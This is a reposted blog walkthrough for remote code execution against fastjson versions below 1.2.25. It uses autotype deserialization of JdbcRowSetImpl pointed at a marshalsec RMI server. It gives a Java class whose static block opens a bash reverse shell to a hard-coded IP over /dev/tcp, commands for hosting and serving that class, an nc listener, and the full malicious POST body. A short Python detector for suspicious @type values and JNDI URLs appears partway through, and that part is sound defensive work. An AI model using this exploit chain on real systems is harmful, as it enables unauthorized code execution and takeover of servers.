Principle
fastjson's autotype feature performs no safety check on the @type field when it deserializes a JSON object. An attacker can therefore name a dangerous class in @type; that class opens a connection to a remote host, and code is executed through the malicious class loaded from there.
Affected versions
fastjson < 1.2.25
Download the tool
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package -DskipTests
After the build finishes, switch to the target directory and create test.java
(command: vim test.java, paste the code below, and change the reverse-shell address and port)
import java.lang.Runtime;
import java.lang.Process;

public class test {
    // Static initializer: runs as soon as the class is loaded by the JNDI reference
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/124.223.63.91/8002 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // swallow any error so class loading is not interrupted
        }
    }
}
Compile test.java (command: javac test.java)
Start an HTTP server so that test.class can be fetched
python2: python2 -m SimpleHTTPServer
python3: python3 -m http.server
Visit 124.223.63.91:8000
Start the RMI service listening on port 9999
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://124.223.63.91:8000/#test" 9999
(8000 is the port of the HTTP server started in the previous step)
Local listener on port 8002 (8002 is the port set in test.java)
Command: nc -nvlp 8002
Construct the request
POST / HTTP/1.1
Host: 172.16.181.6:8090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type:application/json;charset=UTF-8
Upgrade-Insecure-Requests: 1
Content-Length: 157
{
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://124.223.63.91:9999/Test",
        "autoCommit": true
    }
}
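A defender-side check for request bodies like the one above, added here as an example and not part of the original post: it decodes the JSON first (so an escaped key such as \u0040type is still seen as @type), flags any @type outside an assumed allowlist (the class com.example.model.User is a placeholder assumption), and flags any string value that is a JNDI lookup URL, which mirrors the allowlist approach fastjson itself adopted from 1.2.25 onward.

```python
import json
import re
from typing import Any, List

# Types the application legitimately expects in "@type". Constructed placeholder
# for this example; a real deployment lists its own model classes here.
ALLOWED_TYPES = {"com.example.model.User"}

# fastjson < 1.2.25 instantiates whatever class "@type" names; the page's payload
# names JdbcRowSetImpl and points dataSourceName at an attacker-controlled RMI URL.
JNDI_URL = re.compile(r"^\s*(rmi|ldap|ldaps)://", re.IGNORECASE)


def find_findings(node: Any, path: str = "$") -> List[str]:
    """Walk a decoded JSON document and report suspicious spots with their path."""
    findings: List[str] = []
    if isinstance(node, dict):
        if "@type" in node and node["@type"] not in ALLOWED_TYPES:
            findings.append(f"{path}: unexpected @type {node['@type']!r}")
        for key, value in node.items():
            findings.extend(find_findings(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            findings.extend(find_findings(value, f"{path}[{i}]"))
    elif isinstance(node, str) and JNDI_URL.match(node):
        findings.append(f"{path}: JNDI lookup URL {node!r}")
    return findings


def inspect_body(body: str) -> List[str]:
    """Decode, then inspect: decoding resolves escapes, so a key written as
    "\\u0040type" in the raw body is still matched as "@type"."""
    try:
        doc = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    return find_findings(doc)


# Constructed samples: the request body from the page, and a harmless one.
MALICIOUS = ('{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
             '"dataSourceName":"rmi://124.223.63.91:9999/Test","autoCommit":true}}')
BENIGN = '{"b":{"@type":"com.example.model.User","name":"alice"}}'

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, inspect_body(body))
```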
Check the port (the nc listener on 8002)
This article was collected automatically from the Internet or published with the author's authorization; its views do not represent this site's position. If it infringes your rights, contact us and we will remove it. Source: https://blog.csdn.net/m0_63127854/article/details/125360498